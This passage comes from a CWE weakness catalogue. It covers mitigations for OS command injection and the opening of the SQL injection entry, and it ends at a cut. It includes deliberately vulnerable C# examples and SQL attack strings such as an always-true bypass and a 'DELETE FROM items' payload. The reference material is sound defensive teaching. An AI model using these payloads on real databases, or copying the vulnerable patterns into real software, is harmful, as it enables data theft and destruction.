If available, use structured mechanisms that automatically enforce the separation between data and code. These mechanisms may be able to provide the relevant quoting, encoding, and validation automatically, instead of relying on the developer to provide this capability at every point where output is generated.

Some languages offer multiple functions that can be used to invoke commands. Where possible, identify any function that invokes a command shell using a single string, and replace it with a function that requires individual arguments. These functions typically perform appropriate quoting and filtering of arguments. For example, in C, the system() function accepts a string that contains the entire command to be executed, whereas execl(), execve(), and others require an array of strings, one for each argument. In Windows, CreateProcess() only accepts one command at a time. In Perl, if system() is provided with an array of arguments, then it will quote each of the arguments.
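
A minimal sketch of the argument-array approach in Java, using ProcessBuilder; the nslookup path mirrors the earlier Perl example, and the hostname is assumed to be validated elsewhere:

(Good Code)
Example Language: Java 
import java.io.BufferedReader;
import java.io.IOException;
import java.io.InputStreamReader;

// Illustrative parameterized invocation: the hostname is a separate argument,
// so shell metacharacters inside it are never interpreted by a shell.
public final class NsLookup {
    public static void lookup(String hostname) throws IOException, InterruptedException {
        ProcessBuilder pb = new ProcessBuilder("/path/to/nslookup", hostname);
        pb.redirectErrorStream(true);
        Process process = pb.start();
        try (BufferedReader reader =
                new BufferedReader(new InputStreamReader(process.getInputStream()))) {
            String line;
            while ((line = reader.readLine()) != null) {
                System.out.println(line);
            }
        }
        process.waitFor();
    }
}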

Phase: Implementation

Strategy: Input Validation

Assume all input is malicious. Use an "accept known good" input validation strategy, i.e., use a whitelist of acceptable inputs that strictly conform to specifications. Reject any input that does not strictly conform to specifications, or transform it into something that does.

When performing input validation, consider all potentially relevant properties, including length, type of input, the full range of acceptable values, missing or extra inputs, syntax, consistency across related fields, and conformance to business rules. As an example of business rule logic, "boat" may be syntactically valid because it only contains alphanumeric characters, but it is not valid if the input is only expected to contain colors such as "red" or "blue."

Do not rely exclusively on looking for malicious or malformed inputs (i.e., do not rely on a blacklist). A blacklist is likely to miss at least one undesirable input, especially if the code's environment changes. This can give attackers enough room to bypass the intended validation. However, blacklists can be useful for detecting potential attacks or determining which inputs are so malformed that they should be rejected outright.

When constructing OS command strings, use stringent whitelists that limit the character set based on the expected value of the parameter in the request. This will indirectly limit the scope of an attack, but this technique is less important than proper output encoding and escaping.

Note that proper output encoding, escaping, and quoting is the most effective solution for preventing OS command injection, although input validation may provide some defense-in-depth. This is because it effectively limits what will appear in output. Input validation will not always prevent OS command injection, especially if you are required to support free-form text fields that could contain arbitrary characters. For example, when invoking a mail program, you might need to allow the subject field to contain otherwise-dangerous inputs like ";" and ">" characters, which would need to be escaped or otherwise handled. In this case, stripping the character might reduce the risk of OS command injection, but it would produce incorrect behavior because the subject field would not be recorded as the user intended. This might seem to be a minor inconvenience, but it could be more important when the program relies on well-structured subject lines in order to pass messages to other components.

Even if you make a mistake in your validation (such as forgetting one out of 100 input fields), appropriate encoding is still likely to protect you from injection-based attacks. As long as it is not done in isolation, input validation is still a useful technique, since it may significantly reduce your attack surface, allow you to detect some attacks, and provide other security benefits that proper encoding does not address.
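
A hedged example of such a whitelist for the DNS-lookup scenario above: accept only syntactically plausible hostnames before they ever reach a command. The pattern is a deliberate simplification, not a full hostname grammar, and is chosen here mainly to keep shell metacharacters (";", "|", "&", spaces) out of the command entirely:

(Good Code)
Example Language: Java 
import java.util.regex.Pattern;

// Illustrative whitelist: letters, digits, hyphens, and dots only, with a bounded length.
public final class HostnameWhitelist {
    private static final Pattern HOSTNAME =
            Pattern.compile("^[A-Za-z0-9]([A-Za-z0-9.-]{0,253}[A-Za-z0-9])?$");

    public static String requireValidHostname(String input) {
        if (input == null || !HOSTNAME.matcher(input).matches()) {
            throw new IllegalArgumentException("invalid hostname");
        }
        return input;
    }
}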

Phase: Architecture and Design

Strategy: Enforcement by Conversion

When the set of acceptable objects, such as filenames or URLs, is limited or known, create a mapping from a set of fixed input values (such as numeric IDs) to the actual filenames or URLs, and reject all other inputs.

Phase: Operation

Strategies: Compilation or Build Hardening; Environment Hardening

Run the code in an environment that performs automatic taint propagation and prevents any command execution that uses tainted variables, such as Perl's "-T" switch. This will force the program to perform validation steps that remove the taint, although you must be careful to correctly validate your inputs so that you do not accidentally mark dangerous inputs as untainted (see CWE-183 and CWE-184).

Phase: Implementation

Ensure that error messages only contain minimal details that are useful to the intended audience, and nobody else. The messages need to strike the balance between being too cryptic and not being cryptic enough. They should not necessarily reveal the methods that were used to determine the error. Such detailed information can be used to refine the original attack to increase the chances of success.

If errors must be tracked in some detail, capture them in log messages - but consider what could occur if the log messages can be viewed by attackers. Avoid recording highly sensitive information such as passwords in any form. Avoid inconsistent messaging that might accidentally tip off an attacker about internal state, such as whether a username is valid or not.

In the context of OS Command Injection, error information passed back to the user might reveal whether an OS command is being executed and possibly which command is being used.

Phase: Operation

Strategy: Sandbox or Jail

Use runtime policy enforcement to create a whitelist of allowable commands, then prevent use of any command that does not appear in the whitelist. Technologies such as AppArmor are available to do this.

Phase: Operation

Strategy: Firewall

Use an application firewall that can detect attacks against this weakness. It can be beneficial in cases in which the code cannot be fixed (because it is controlled by a third party), as an emergency prevention measure while more comprehensive software assurance measures are applied, or to provide defense in depth.

Effectiveness: Moderate

An application firewall might not cover all possible input vectors. In addition, attack techniques might be available to bypass the protection mechanism, such as using malformed inputs that can still be processed by the component that receives those inputs. Depending on functionality, an application firewall might inadvertently reject or modify legitimate requests. Finally, some manual effort may be required for customization.

Phases: Architecture and Design; Operation

Strategy: Environment Hardening

Run your code using the lowest privileges that are required to accomplish the necessary tasks [R.78.9]. If possible, create isolated accounts with limited privileges that are only used for a single task. That way, a successful attack will not immediately give the attacker access to the rest of the software or its environment. For example, database applications rarely need to run as the database administrator, especially in day-to-day operations.

Phases: Operation; Implementation

Strategy: Environment Hardening

When using PHP, configure the application so that it does not use register_globals. During implementation, develop the application so that it does not rely on this feature, but be wary of implementing a register_globals emulation that is subject to weaknesses such as CWE-95, CWE-621, and similar issues.

+ Relationships
Nature | Type | ID | Name | View(s) this relationship pertains to
ChildOf | Weakness Class | 77 | Improper Neutralization of Special Elements used in a Command ('Command Injection')
  Development Concepts (primary) 699
  Research Concepts (primary) 1000
  Weaknesses for Simplified Mapping of Published Vulnerabilities (primary) 1003
ChildOf | Category | 634 | Weaknesses that Affect System Processes
  Resource-specific Weaknesses (primary) 631
ChildOf | Category | 714 | OWASP Top Ten 2007 Category A3 - Malicious File Execution
  Weaknesses in OWASP Top Ten (2007) (primary) 629
ChildOf | Category | 727 | OWASP Top Ten 2004 Category A6 - Injection Flaws
  Weaknesses in OWASP Top Ten (2004) (primary) 711
ChildOf | Category | 741 | CERT C Secure Coding Section 07 - Characters and Strings (STR)
  Weaknesses Addressed by the CERT C Secure Coding Standard (primary) 734
ChildOf | Category | 744 | CERT C Secure Coding Section 10 - Environment (ENV)
  Weaknesses Addressed by the CERT C Secure Coding Standard 734
ChildOf | Category | 751 | 2009 Top 25 - Insecure Interaction Between Components
  Weaknesses in the 2009 CWE/SANS Top 25 Most Dangerous Programming Errors (primary) 750
ChildOf | Category | 801 | 2010 Top 25 - Insecure Interaction Between Components
  Weaknesses in the 2010 CWE/SANS Top 25 Most Dangerous Programming Errors (primary) 800
ChildOf | Category | 810 | OWASP Top Ten 2010 Category A1 - Injection
  Weaknesses in OWASP Top Ten (2010) (primary) 809
ChildOf | Category | 845 | CERT Java Secure Coding Section 00 - Input Validation and Data Sanitization (IDS)
  Weaknesses Addressed by the CERT Java Secure Coding Standard (primary) 844
ChildOf | Category | 864 | 2011 Top 25 - Insecure Interaction Between Components
  Weaknesses in the 2011 CWE/SANS Top 25 Most Dangerous Software Errors (primary) 900
ChildOf | Category | 875 | CERT C++ Secure Coding Section 07 - Characters and Strings (STR)
  Weaknesses Addressed by the CERT C++ Secure Coding Standard (primary) 868
ChildOf | Category | 878 | CERT C++ Secure Coding Section 10 - Environment (ENV)
  Weaknesses Addressed by the CERT C++ Secure Coding Standard 868
ChildOf | Category | 929 | OWASP Top Ten 2013 Category A1 - Injection
  Weaknesses in OWASP Top Ten (2013) (primary) 928
ChildOf | Category | 990 | SFP Secondary Cluster: Tainted Input to Command
  Software Fault Pattern (SFP) Clusters (primary) 888
CanAlsoBe | Weakness Base | 88 | Argument Injection or Modification
  Research Concepts 1000
MemberOf | View | 630 | Weaknesses Examined by SAMATE
  Weaknesses Examined by SAMATE (primary) 630
MemberOf | View | 635 | Weaknesses Used by NVD
  Weaknesses Used by NVD (primary) 635
MemberOf | View | 884 | CWE Cross-section
  CWE Cross-section (primary) 884
CanFollow | Weakness Base | 184 | Incomplete Blacklist
  Research Concepts 1000
+ Research Gaps

More investigation is needed into the distinctions between the OS command injection variants, including their relationship to argument injection (CWE-88). Equivalent distinctions may exist in other injection-related problems such as SQL injection.

+ Affected Resources
  • System Process
+ Functional Areas
  • Program invocation
+ Taxonomy Mappings
Mapped Taxonomy Name | Node ID | Fit | Mapped Node Name
PLOVER | - | - | OS Command Injection
OWASP Top Ten 2007 | A3 | CWE More Specific | Malicious File Execution
OWASP Top Ten 2004 | A6 | CWE More Specific | Injection Flaws
CERT C Secure Coding | ENV03-C | - | Sanitize the environment when invoking external programs
CERT C Secure Coding | ENV04-C | - | Do not call system() if you do not need a command processor
CERT C Secure Coding | STR02-C | - | Sanitize data passed to complex subsystems
WASC | 31 | - | OS Commanding
CERT Java Secure Coding | IDS07-J | - | Do not pass untrusted, unsanitized data to the Runtime.exec() method
CERT C++ Secure Coding | STR02-CPP | - | Sanitize data passed to complex subsystems
CERT C++ Secure Coding | ENV03-CPP | - | Sanitize the environment when invoking external programs
CERT C++ Secure Coding | ENV04-CPP | - | Do not call system() if you do not need a command processor
Software Fault Patterns | SFP24 | - | Tainted input to command
+ White Box Definitions

A weakness where the code path has:

1. start statement that accepts input

2. end statement that executes an operating system command where

a. the input is used as a part of the operating system command and

b. the operating system command is undesirable

Where "undesirable" is defined through the following scenarios:

1. not validated

2. incorrectly validated
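
As a minimal, hypothetical C# fragment that matches this code-path pattern (not taken from this entry), the input read in the first statement reaches the operating system command in the last statement without any validation:

Example Language: C#
using System;
using System.Diagnostics;

static class Listing
{
    static void Main()
    {
        // 1. start statement that accepts input
        string dir = Console.ReadLine();

        // 2. end statement that executes an operating system command,
        //    where the unvalidated input is used as part of the command
        //    (the "undesirable" case defined above).
        Process.Start("cmd.exe", "/c dir " + dir);
    }
}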

+ References
[R.78.1] G. Hoglund and G. McGraw. "Exploiting Software: How to Break Code". Addison-Wesley. 2004-02.
[R.78.2] Pascal Meunier. "Meta-Character Vulnerabilities". 2008-02-20. <http://www.cs.purdue.edu/homes/cs390s/slides/week09.pdf>.
[R.78.3] Robert Auger. "OS Commanding". 2009-06. <http://projects.webappsec.org/OS-Commanding>.
[R.78.4] Lincoln Stein and John Stewart. "The World Wide Web Security FAQ". Chapter: "CGI Scripts". 2002-02-04. <http://www.w3.org/Security/Faq/wwwsf4.html>.
[R.78.5] Jordan Dimov, Cigital. "Security Issues in Perl Scripts". <http://www.cgisecurity.com/lib/sips.html>.
[R.78.6] Michael Howard, David LeBlanc and John Viega. "24 Deadly Sins of Software Security". "Sin 10: Command Injection." Page 171. McGraw-Hill. 2010.
[R.78.7] Frank Kim. "Top 25 Series - Rank 9 - OS Command Injection". SANS Software Security Institute. 2010-02-24. <http://blogs.sans.org/appsecstreetfighter/2010/02/24/top-25-series-rank-9-os-command-injection/>.
[R.78.8] OWASP. "OWASP Enterprise Security API (ESAPI) Project". <http://www.owasp.org/index.php/ESAPI>.
[R.78.9] Sean Barnum and Michael Gegick. "Least Privilege". 2005-09-14. <https://buildsecurityin.us-cert.gov/daisy/bsi/articles/knowledge/principles/351.html>.
[R.78.10] Mark Dowd, John McDonald and Justin Schuh. "The Art of Software Security Assessment". Chapter 8, "Shell Metacharacters", Page 425. 1st Edition. Addison Wesley. 2006.
+ Content History
Submissions
Submission Date | Submitter | Organization | Source
- | PLOVER | - | Externally Mined
Modifications
Modification Date | Modifier | Organization | Source
2008-07-01 | Sean Eidemiller | Cigital | External
  added/updated demonstrative examples
2008-07-01 | Eric Dalci | Cigital | External
  updated Time_of_Introduction
2008-08-01 | - | KDM Analytics | External
  added/updated white box definitions
2008-08-15 | - | Veracode | External
  Suggested OWASP Top Ten 2004 mapping
2008-09-08 | CWE Content Team | MITRE | Internal
  updated Relationships, Other_Notes, Taxonomy_Mappings
2008-10-14 | CWE Content Team | MITRE | Internal
  updated Description
2008-11-24 | CWE Content Team | MITRE | Internal
  updated Observed_Examples, Relationships, Taxonomy_Mappings
2009-01-12 | CWE Content Team | MITRE | Internal
  updated Common_Consequences, Demonstrative_Examples, Description, Likelihood_of_Exploit, Name, Observed_Examples, Other_Notes, Potential_Mitigations, Relationships, Research_Gaps, Terminology_Notes
2009-03-10 | CWE Content Team | MITRE | Internal
  updated Potential_Mitigations
2009-05-27 | CWE Content Team | MITRE | Internal
  updated Name, Related_Attack_Patterns
2009-07-17 | - | KDM Analytics | External
  Improved the White_Box_Definition
2009-07-27 | CWE Content Team | MITRE | Internal
  updated Description, Name, White_Box_Definitions
2009-10-29 | CWE Content Team | MITRE | Internal
  updated Observed_Examples, References
2009-12-28 | CWE Content Team | MITRE | Internal
  updated Detection_Factors
2010-02-16 | CWE Content Team | MITRE | Internal
  updated Detection_Factors, Potential_Mitigations, References, Relationships, Taxonomy_Mappings
2010-04-05 | CWE Content Team | MITRE | Internal
  updated Potential_Mitigations
2010-06-21 | CWE Content Team | MITRE | Internal
  updated Common_Consequences, Description, Detection_Factors, Name, Observed_Examples, Potential_Mitigations, References, Relationships
2010-09-27 | CWE Content Team | MITRE | Internal
  updated Potential_Mitigations
2010-12-13 | CWE Content Team | MITRE | Internal
  updated Description, Potential_Mitigations
2011-03-29 | CWE Content Team | MITRE | Internal
  updated Demonstrative_Examples, Description
2011-06-01 | CWE Content Team | MITRE | Internal
  updated Common_Consequences, Relationships, Taxonomy_Mappings
2011-06-27 | CWE Content Team | MITRE | Internal
  updated Relationships
2011-09-13 | CWE Content Team | MITRE | Internal
  updated Potential_Mitigations, References, Relationships, Taxonomy_Mappings
2012-05-11 | CWE Content Team | MITRE | Internal
  updated Demonstrative_Examples, References, Relationships, Taxonomy_Mappings
2012-10-30 | CWE Content Team | MITRE | Internal
  updated Observed_Examples, Potential_Mitigations
2014-02-18 | CWE Content Team | MITRE | Internal
  updated Applicable_Platforms, Demonstrative_Examples, Terminology_Notes
2014-06-23 | CWE Content Team | MITRE | Internal
  updated Relationships
2014-07-30 | CWE Content Team | MITRE | Internal
  updated Detection_Factors, Relationships, Taxonomy_Mappings
2015-12-07 | CWE Content Team | MITRE | Internal
  updated Relationships
Previous Entry Names
Change Date | Previous Entry Name
2008-04-11 | OS Command Injection
2009-01-12 | Failure to Sanitize Data into an OS Command (aka 'OS Command Injection')
2009-05-27 | Failure to Preserve OS Command Structure (aka 'OS Command Injection')
2009-07-27 | Failure to Preserve OS Command Structure ('OS Command Injection')
2010-06-21 | Improper Sanitization of Special Elements used in an OS Command ('OS Command Injection')

CWE-89: Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')

Weakness ID: 89
Abstraction: Base
Status: Draft
+ Description

Description Summary

The software constructs all or part of an SQL command using externally-influenced input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify the intended SQL command when it is sent to a downstream component.

Extended Description

Without sufficient removal or quoting of SQL syntax in user-controllable inputs, the generated SQL query can cause those inputs to be interpreted as SQL instead of ordinary user data. This can be used to alter query logic to bypass security checks, or to insert additional statements that modify the back-end database, possibly including execution of system commands.

SQL injection has become a common issue with database-driven web sites. The flaw is easily detected and easily exploited; as such, any site or software package with even a minimal user base is likely to be subject to attempted attacks of this kind. The flaw is possible because SQL makes no real distinction between the control plane and the data plane.

+ Time of Introduction
  • Architecture and Design
  • Implementation
  • Operation
+ Applicable Platforms

Languages

All

Technology Classes

Database-Server

+ Modes of Introduction

This weakness typically appears in data-rich applications that save user inputs in a database.

+ Common Consequences
Scope | Effect
Confidentiality

Technical Impact: Read application data

Since SQL databases generally hold sensitive data, loss of confidentiality is a frequent problem with SQL injection vulnerabilities.

Access Control

Technical Impact: Bypass protection mechanism

If poorly constructed SQL commands are used to check user names and passwords, it may be possible to connect to a system as another user with no previous knowledge of the password. (A brief sketch of this case follows this list of consequences.)

Access Control

Technical Impact: Bypass protection mechanism

If authorization information is held in a SQL database, it may be possible to change this information through the successful exploitation of a SQL injection vulnerability.

Integrity

Technical Impact: Modify application data

Just as it may be possible to read sensitive information, it is also possible to make changes or even delete this information with a SQL injection attack.
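
As a brief sketch of the authentication-bypass consequence noted above (the query, table, and column names are hypothetical, and the fragment mirrors the style of the demonstrative examples below):

(Bad Code)
Example Language: C#
string query = "SELECT * FROM users WHERE username = '" + userName +
               "' AND password = '" + password + "'";

If an attacker supplies the user name

(Attack)
 
' OR '1'='1' --

the WHERE clause becomes a condition that is always true and the trailing comment removes the password check, so the query can return a row without the attacker knowing any valid password.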

+ Likelihood of Exploit

Very High

+ Enabling Factors for Exploitation

The application dynamically generates queries that contain user input.

+ Detection Methods

Automated Static Analysis

This weakness can often be detected using automated static analysis tools. Many modern tools use data flow analysis or constraint-based techniques to minimize the number of false positives.

Automated static analysis might not be able to recognize when proper input validation is being performed, leading to false positives - i.e., warnings that do not have any security consequences or do not require any code changes.

Automated static analysis might not be able to detect the usage of custom API functions or third-party libraries that indirectly invoke SQL commands, leading to false negatives - especially if the API/library code is not available for analysis.

This is not a perfect solution, since 100% accuracy and coverage are not feasible.

Automated Dynamic Analysis

This weakness can be detected using dynamic tools and techniques that interact with the software using large test suites with many diverse inputs, such as fuzz testing (fuzzing), robustness testing, and fault injection. The software's operation may slow down, but it should not become unstable, crash, or generate incorrect results.

Effectiveness: Moderate

Manual Analysis

Manual analysis can be useful for finding this weakness, but it might not achieve desired code coverage within limited time constraints. This becomes difficult for weaknesses that must be considered for all inputs, since the attack surface can be too large.

Automated Static Analysis - Binary / Bytecode

According to SOAR, the following detection techniques may be useful:

Highly cost effective:

  • Bytecode Weakness Analysis - including disassembler + source code weakness analysis

  • Binary Weakness Analysis - including disassembler + source code weakness analysis

Effectiveness: SOAR High

Dynamic Analysis with automated results interpretation

According to SOAR, the following detection techniques may be useful:

Highly cost effective:

  • Database Scanners

Cost effective for partial coverage:

  • Web Application Scanner

  • Web Services Scanner

Effectiveness: SOAR High

Dynamic Analysis with manual results interpretation

According to SOAR, the following detection techniques may be useful:

Cost effective for partial coverage:

  • Fuzz Tester

  • Framework-based Fuzzer

Effectiveness: SOAR Partial

Manual Static Analysis - Source Code

According to SOAR, the following detection techniques may be useful:

Highly cost effective:

  • Manual Source Code Review (not inspections)

Cost effective for partial coverage:

  • Focused Manual Spotcheck - Focused manual analysis of source

Effectiveness: SOAR High

Automated Static Analysis - Source Code

According to SOAR, the following detection techniques may be useful:

Highly cost effective:

  • Source code Weakness Analyzer

  • Context-configured Source Code Weakness Analyzer

Effectiveness: SOAR High

Architecture / Design Review

According to SOAR, the following detection techniques may be useful:

Highly cost effective:

  • Formal Methods / Correct-By-Construction

Cost effective for partial coverage:

  • Inspection (IEEE 1028 standard) (can apply to requirements, design, source code, etc.)

Effectiveness: SOAR High

+ Demonstrative Examples

Example 1

In 2008, a large number of web servers were compromised using the same SQL injection attack string. This single string worked against many different programs. The SQL injection was then used to modify the web sites to serve malicious code. [1]

Example 2

The following code dynamically constructs and executes a SQL query that searches for items matching a specified name. The query restricts the items displayed to those where owner matches the user name of the currently-authenticated user.

(Bad Code)
Example Language: C# 
...
string userName = ctx.getAuthenticatedUserName();
string query = "SELECT * FROM items WHERE owner = '" + userName + "' AND itemname = '" + ItemName.Text + "'";
sda = new SqlDataAdapter(query, conn);
DataTable dt = new DataTable();
sda.Fill(dt);
...

The query that this code intends to execute follows:

SELECT * FROM items WHERE owner = <userName> AND itemname = <itemName>;

However, because the query is constructed dynamically by concatenating a constant base query string and a user input string, the query only behaves correctly if itemName does not contain a single-quote character. If an attacker with the user name wiley enters the string:

(Attack)
 
name' OR 'a'='a

for itemName, then the query becomes the following:

(Attack)
 
SELECT * FROM items WHERE owner = 'wiley' AND itemname = 'name' OR 'a'='a';

The addition of the:

(Attack)
 
OR 'a'='a

condition causes the WHERE clause to always evaluate to true, so the query becomes logically equivalent to the much simpler query:

(Attack)
 
SELECT * FROM items;

This simplification of the query allows the attacker to bypass the requirement that the query only return items owned by the authenticated user; the query now returns all entries stored in the items table, regardless of their specified owner.
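
One way to remove this weakness from the fragment above (a sketch only, not part of the original example) is to use a parameterized query, so that ItemName.Text is always bound as data rather than concatenated into the SQL text:

(Good Code)
Example Language: C#
...
string userName = ctx.getAuthenticatedUserName();
string query = "SELECT * FROM items WHERE owner = @owner AND itemname = @itemName";
sda = new SqlDataAdapter(query, conn);
sda.SelectCommand.Parameters.AddWithValue("@owner", userName);
sda.SelectCommand.Parameters.AddWithValue("@itemName", ItemName.Text);
DataTable dt = new DataTable();
sda.Fill(dt);
...

With parameters, an input such as name' OR 'a'='a is matched literally against the itemname column instead of altering the query structure. Example 3 below continues to analyze the original, concatenated query.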

Example 3

This example examines the effects of a different malicious value passed to the query constructed and executed in the previous example.

If an attacker with the user name wiley enters the string:

(Attack)
 
name'; DELETE FROM items; --

for itemName, then the query becomes the following two queries:

(Attack)
Example Language: SQL 
SELECT * FROM items WHERE owner = 'wiley' AND itemname = 'name';
DELETE FROM items;
--'

Many database servers, including Microsoft(R) SQL Server 2000, allow multiple SQL statements separated by semicolons to be executed at once. While this attack string results in an error on Oracle and other database servers that do not allow the batch-execution of statements separated by semicolons, on databases that do allow batch execution, this type of attack allows the attacker to execute arbitrary commands against the database.

Notice the trailing pair of hyphens (--), which specifies to most database servers that the remainder of the statement is to be treated as a comment and not executed. In this case the comment character serves to remove the trailing single-quote left over from the modified query. On a database where comments are not allowed to be used in this way, the general attack could still be made effective using a trick similar to the one shown in the previous example.

If an attacker enters the string

(Attack)
 
name'; DELETE FROM items; SELECT * FROM items WHERE 'a'='a

Then the following three valid statements will